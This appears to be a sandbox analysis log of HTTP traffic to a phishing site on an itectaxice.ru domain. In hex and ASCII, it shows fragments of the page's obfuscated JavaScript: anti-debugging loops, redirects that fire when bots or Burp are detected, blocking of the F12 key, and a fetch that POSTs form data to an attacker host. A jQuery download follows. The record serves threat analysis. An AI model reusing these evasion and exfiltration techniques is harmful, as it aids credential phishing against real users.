                                                      2025-01-14 15:11:21 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 6c 74 52 44 42 77 59 32 68 53 65 58 51 78 54 44 42 32 64 31 68 46 61 57 55 72 64 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 45 4a 56 54 69 39 78 64 43 39 36 4d 6b 45 7a 63 6d 4a 6f 51 55 30 34 4e 33 42 68 64 6d 6c 71 63 7a 41 35 51 31 52 45 64 44 52 44 65 54 68 58 53 6e 49 30 5a 30 70 72 59 6d 6c 70 61 30 5a 30 5a 32 55 30 52 6e 52 4c 52 32 6f 7a 63 55 70 6c 4d 30 4a 57 53 33 46 69 63 6c 4a 36 62 6d 5a 54 54 44 4d 32 5a 55 4e 54 59 57 68 55 56 6d 39 45 55 6d 63 77 56 58 5a 54 56 6e 46 75 59 6c 64 4c 62 6b 51 7a 54 47 68 44 64 33 5a 35 56 55 35 54 62 6c 52 49 53 58 41 78 56 48 59 32 54 6e 56 43 4e 7a 42 75 62 57 56 6a 54 6e 41
                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkltRDBwY2hSeXQxTDB2d1hFaWUrdmc9PSIsInZhbHVlIjoiNEJVTi9xdC96MkEzcmJoQU04N3BhdmlqczA5Q1REdDRDeThXSnI0Z0prYmlpa0Z0Z2U0RnRLR2ozcUplM0JWS3FiclJ6bmZTTDM2ZUNTYWhUVm9EUmcwVXZTVnFuYldLbkQzTGhDd3Z5VU5TblRISXAxVHY2TnVCNzBubWVjTnA
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 34 30 66 32 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 75 73 75 61 6c 6c 79 20 63 6f 6d 65 73 20 74 6f 20 74 68 6f 73 65 20 77 68 6f 20 61 72 65 20 74 6f 6f 20 62 75 73 79 20 74 6f 20 62 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 74 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 44 6f 6e 26 23 30 33 39 3b 74 20 62 65 20 64 69 73 74 72 61 63 74 65 64 20 62 79 20 63 72 69 74 69 63 69 73 6d 2e 20 52 65 6d 65 6d 62 65 72 2c 20 74 68 65 20 6f 6e 6c 79 20 74 61 73 74 65 20 6f 66 20 73 75 63 63 65 73 73 20 73 6f 6d 65 20 70 65 6f 70 6c 65 20 67 65 74 20 69 73 20 74 6f 20 74 61 6b 65 20 61 20 62 69 74 65 20 6f 75 74 20 6f 66 20 79 6f 75 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 74 68 65 20 73 75 6d 20 6f 66 20 73 6d 61
                                                      Data Ascii: 40f2... Success usually comes to those who are too busy to be looking for it. -->... Don&#039;t be distracted by criticism. Remember, the only taste of success some people get is to take a bite out of you. --><script>/* Success is the sum of sma
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 78 70 56 30 46 4f 5a 47 64 73 53 55 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 78 70 56 30 46 4f 5a 47 64 73 53 55 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 54 47 6c 58 51 55 35 6b 5a 32 78 4a 53 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 78 70 56 30 46 4f 5a 47 64 73 53 55 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49
                                                      Data Ascii: xpV0FOZGdsSUogaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0xpV0FOZGdsSUogaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojTGlXQU5kZ2xJSiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0xpV0FOZGdsSUouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246I
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 69 51 6e 56 79 63 43 49 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48
                                                      Data Ascii: iQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldH
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 43 69 41 67 49 43 42 73 5a 58 51 67 55 6b 78 4b 63 55 4e 54 56 32 64 50 62 79 41 39 49 47 5a 68 62 48 4e 6c 4f 77 30 4b 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 68 5a 51 6e 56 54 64 6e 46 59 56 55 30 67 50 53 41 78 4d 44 41 37 44 51 6f 67 49 43 41 67 63 32 56 30 53 57 35 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 68 59 52 31 70 70 54 48 70 79 59 33 6b 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 4a 47 62 30 4a 4f 54 46 64 4d 54 46 45 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35
                                                      Data Ascii: CiAgICBsZXQgUkxKcUNTV2dPbyA9IGZhbHNlOw0KICAgIGNvbnN0IEhZQnVTdnFYVU0gPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IGhYR1ppTHpyY3kgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IEJGb0JOTFdMTFEgPSBwZXJmb3JtYW5
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 64 57 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 31 59 53 49 67 64 6d 46 73 64 57 55 39 49 6c 56 75 61 32 35 76 64 32 34 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b
                                                      Data Ascii: nB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkdWEiIG5hbWU9ImJsdGR1YSIgdmFsdWU9IlVua25vd24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 30 5a 58 68 30 4b 43 6b 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 52 6c 65 48 51 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 47 6c 6d 4b 48 52 6c 65 48 51 67 50 54 30 67 4d 43 6c 37 44 51 6f 67 49 43 41 67 5a 6d 56 30 59 32 67 6f 54 47 31 59 5a 56 70 57 63 6d 52 47 63 79 77 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 74 5a 58 52 6f 62 32 51 36 49 43 4a 51 54 31 4e 55 49 69 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 46 56 50 64 48 64 30 62 57 74 58 65 6d 67 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62
                                                      Data Ascii: RoZW4ocmVzcG9uc2UgPT4gew0KICAgIHJldHVybiByZXNwb25zZS50ZXh0KCkNCiAgICB9KS50aGVuKHRleHQgPT4gew0KICAgIGlmKHRleHQgPT0gMCl7DQogICAgZmV0Y2goTG1YZVpWcmRGcywgew0KICAgICAgICBtZXRob2Q6ICJQT1NUIiwNCiAgICAgICAgYm9keTogbmV3IEZvcm1EYXRhKFVPdHd0bWtXemgpDQogICAgfSkudGhlb
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 4c 79 39 6a 54 43 35 70 64 47 56 6a 64 47 46 34 61 57 4e 6c 4c 6e 4a 31 4c 31 46 74 4e 7a 55 76 22 29 29 3b 0d 0a 63 6f 6e 73 74 20 75 71 4a 6b 45 42 6c 6a 47 57 20 3d 20 42 61 65 65 42 53 65 72 49 73 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 69 48 78 58 5a 41 50 48 61 4d 20 3f 20 42 61 65 65 42 53 65 72 49 73 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 42 61 65 65 42 53 65 72 49 73 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 54 68 65 20 73 65 63 72 65 74 20 6f 66 20 73 75 63 63 65 73 73 20 69 73 20 74 6f 20 64 6f 20 74 68 65 20 63 6f 6d 6d 6f 6e 20 74 68 69 6e 67 20 75 6e 63 6f 6d 6d 6f 6e 6c 79 20 77 65 6c 6c 2e 20 2a 2f 0d 0a 69 66 28 75 71 4a 6b 45 42 6c 6a 47 57 20
                                                      Data Ascii: Ly9jTC5pdGVjdGF4aWNlLnJ1L1FtNzUv"));const uqJkEBljGW = BaeeBSerIs.hostname === iHxXZAPHaM ? BaeeBSerIs.hostname : BaeeBSerIs.hostname.split('.').slice(-2).join('.');/* The secret of success is to do the common thing uncommonly well. */if(uqJkEBljGW
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 62 33 5a 6c 63 6d 5a 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 4d 61 56 64 42 54 6d 52 6e 62 45 6c 4b 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 30 78 70 56 30 46 4f 5a 47 64 73 53 55 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 78 70 56 30 46 4f 5a
                                                      Data Ascii: dodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNMaVdBTmRnbElKIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI0xpV0FOZGdsSUogaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0xpV0FOZ
                                                      2025-01-14 15:11:21 UTC1369INData Raw: 73 5a 54 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 50 67 30 4b 49 43 41 67 49 47 6c 6d 49 43 68 75 59 58 5a 70 5a 32 46 30 62 33 49 75 64 32 56 69 5a 48 4a 70 64 6d 56 79 49 48 78 38 49 48 64 70 62 6d 52 76 64 79 35 6a 59 57 78 73 55 47 68 68 62 6e 52 76 62 53 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 58 33 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 56 7a 5a 58 4a 42 5a 32 56 75 64 43 35 70 62 6d 4e 73 64 57 52 6c 63 79 67 69 51 6e 56 79 63 43 49 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d
                                                      Data Ascii: sZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdm


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.749723151.101.194.1374433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:21 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                      Host: code.jquery.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://2ol.itectaxice.ru/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:22 UTC613INHTTP/1.1 200 OK
                                                      Connection: close
                                                      Content-Length: 89501
                                                      Server: nginx
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                      ETag: "28feccc0-15d9d"
                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                      Access-Control-Allow-Origin: *
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Via: 1.1 varnish, 1.1 varnish
                                                      Accept-Ranges: bytes
                                                      Age: 2352008
                                                      Date: Tue, 14 Jan 2025 15:11:21 GMT
                                                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740071-EWR
                                                      X-Cache: HIT, HIT
                                                      X-Cache-Hits: 2774, 0
                                                      X-Timer: S1736867482.977540,VS0,VE1
                                                      Vary: Accept-Encoding
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                      Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                      Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                      Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                      Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                      Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                      2025-01-14 15:11:22 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                      Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
